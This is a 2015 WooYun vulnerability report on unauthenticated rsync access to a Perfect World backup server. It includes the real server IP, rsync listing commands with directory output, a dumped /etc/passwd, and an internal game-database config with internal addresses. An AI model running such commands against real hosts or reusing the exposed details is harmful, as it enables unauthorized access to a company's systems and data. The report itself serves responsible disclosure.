当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138199

漏洞标题:完美世界某rsync未授权访问泄露大量敏感信息

相关厂商:完美世界

漏洞作者: 星明月稀

提交时间:2015-08-31 17:19

修复时间:2015-10-15 19:44

公开时间:2015-10-15 19:44

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-31: 细节已通知厂商并且等待厂商处理中
2015-08-31: 厂商已经确认,细节仅向厂商公开
2015-09-10: 细节向核心白帽子及相关领域专家公开
2015-09-20: 细节向普通白帽子公开
2015-09-30: 细节向实习白帽子公开
2015-10-15: 细节向公众公开

简要描述:

完美世界某rsync未授权访问泄露大量敏感信息

详细说明:

同个网段同种问题: WooYun: 完美时空某rsync未授权访问泄露大量游戏数据备份 

rsync --old-d 58.215.52.90::backup/
drwxr-xr-x        4096 2015/07/29 08:20:21 .
-rw-r--r--          71 2011/05/19 14:06:27 addsudo.txt
drwxr-xr-x          21 2012/06/13 14:54:29 apptools
drwxr-xr-x        4096 2015/07/29 08:20:22 backup
drwxr-xr-x        4096 2011/05/31 08:16:05 beiji
drwxr-xr-x        4096 2015/08/05 00:34:29 cashstat
drwxr-xr-x         100 2010/12/14 03:40:02 cricket-data
drwxr-xr-x        4096 2015/07/29 08:20:22 database
drwxr-xr-x        4096 2015/08/05 15:02:58 game1
drwxr-xr-x          37 2015/07/29 08:20:23 link2
drwxr-xr-x        4096 2015/08/31 04:03:03 logs
drwxr-xr-x      118784 2015/08/05 06:02:18 market
drwxr-xr-x           6 2010/12/23 11:41:19 monitor
drwxr-xr-x        4096 2013/07/16 14:32:30 nuofu
-r--r-----        5245 2011/05/18 10:35:01 sudoers.bak
drwxr-xr-x        4096 2015/08/05 00:40:56 tmp
drwxr-xr-x          54 2015/08/04 18:05:01 web


漏洞证明:

备份整个linux系统目录:

rsync --old-d 58.215.52.90::backup/database/
drwxr-xr-x        4096 2015/07/29 08:20:22 .
-rw-r--r--           0 2015/02/25 15:20:13 .autofsck
drwxr-xr-x        4096 2011/12/06 04:02:12 bin
drwxr-xr-x          17 2010/04/29 21:47:45 boot
drwxr-xr-x           6 2010/05/04 20:30:09 dbf
drwxr-xr-x          62 2010/04/29 20:02:27 dev
drwxr-xr-x        4096 2015/08/27 04:02:03 etc
drwxr-xr-x          19 2012/12/06 15:29:22 home
drwxr-xr-x           6 2005/02/22 08:57:49 initrd
drwxr-xr-x        8192 2015/08/27 04:02:03 lib
drwxr-xr-x           6 2005/02/22 08:57:49 media
drwxr-xr-x           6 2005/02/22 08:57:49 mnt
drwxr-xr-x           6 2005/02/22 08:57:49 opt
drwxr-xr-x           6 2010/04/29 17:19:06 proc
drwxr-xr-x        4096 2015/07/29 08:20:11 root
drwxr-xr-x        4096 2012/03/13 04:02:05 sbin
drwxr-xr-x           6 2010/04/29 17:19:05 selinux
drwxr-xr-x           6 2005/02/22 08:57:49 srv
drwxr-xr-x           6 2010/04/29 17:19:06 sys
drwxrwxrwt        4096 2015/08/05 06:02:01 tmp
drwxr-xr-x        4096 2014/06/04 15:05:16 usr
drwxr-xr-x        4096 2010/04/29 21:43:04 var


etc/passwd

root:x:0:0:root:/root:/bin/bash
  2 bin:x:1:1:bin:/bin:/sbin/nologin
  3 daemon:x:2:2:daemon:/sbin:/sbin/nologin
  4 adm:x:3:4:adm:/var/adm:/sbin/nologin
  5 lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  6 sync:x:5:0:sync:/sbin:/bin/sync
  7 shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  8 halt:x:7:0:halt:/sbin:/sbin/halt
  9 mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
 10 news:x:9:13:news:/etc/news:/sbin/nologin
 11 uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
 12 operator:x:11:0:operator:/root:/sbin/nologin
 13 games:x:12:100:games:/usr/games:/sbin/nologin
 14 gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
 15 ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
 16 nobody:x:99:99:Nobody:/:/sbin/nologin
 17 dbus:x:81:81:System message bus:/:/sbin/nologin
 18 vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
 19 rpm:x:37:37::/var/lib/rpm:/sbin/nologin
 20 haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
 21 netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
 22 sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
 23 rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
 24 mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
 25 smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
 26 pcap:x:77:77::/var/arpwatch:/sbin/nologin
 27 ntp:x:38:38::/etc/ntp:/sbin/nologin
 28 pagent:x:500:500::/home/pagent:/bin/bash


backup/database/root/gamedbd/cashstat.conf

[GameDBClient]          
type            =   tcp 
port            =   29400       
address         =   172.16.2.117
so_sndbuf       =   16384       
so_rcvbuf       =   16384       
ibuffermax      =       1048576
obuffermax      =       1048576
;so_broadcast       =   1       
tcp_nodelay     =   0   
accumulate      =   268435456
zoneid			=	14
[storage]
homedir             =   ./dbhome
datadir             =   dbdata
logdir              =   dblogs
backupdir           =   ./backup
cachesize           =   16777216
errpfx              =   Storage
checkpoint_interval =   300
backup_interval     =   86400
[storagewdb]
homedir                 =       ./dbhomewdb
datadir                 =       dbdata
logdir                  =       dblogs
backupdir               =       ./backupwdb
checkpoint_interval     =       60
times_incbackup         =       1
tables                  =      auction,city,equipment,friends,messages,status,user,auctionindex,clsconfig,factioninfo,inventory,rolename,storehouse,userfaction,base,config,factionname,mailbox,sellpoint,task,translog,waitdel,gtask,order,shoplog,syslog,userstore,webtrade,webtradesold,serverdata,factionfortress,factionrelation,force,friendext,globalcontrol,crslogicuid,rolenamehis,kingelection,playershop,weborderitem,playerprofile,uniquedata,recalluser,mappassword,solochallengerank,mnfactioninfo,mnfactionapplyinfo,mndomaininfo,mndomainbonus
cache_high_default      =       8000
cache_low_default       =       7500
;base_cache_high                =       50000
;base_cache_low         =       45000
;status_cache_high      =       50000
;status_cache_low       =       45000
;inventory_cache_high   =       50000
;inventory_cache_low    =       45000
;task_cache_high                =       50000
;task_cache_low         =       45000
backup_lockfile         =       /tmp/.lockgamedbd
quit_lockfile           =       /tmp/.quitgamedbd

修复方案:

加入授权。

版权声明:转载请注明来源 星明月稀@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-31 19:42

厂商回复:

感谢洞主对完美世界的关注,我们将尽快修补。

最新状态:

暂无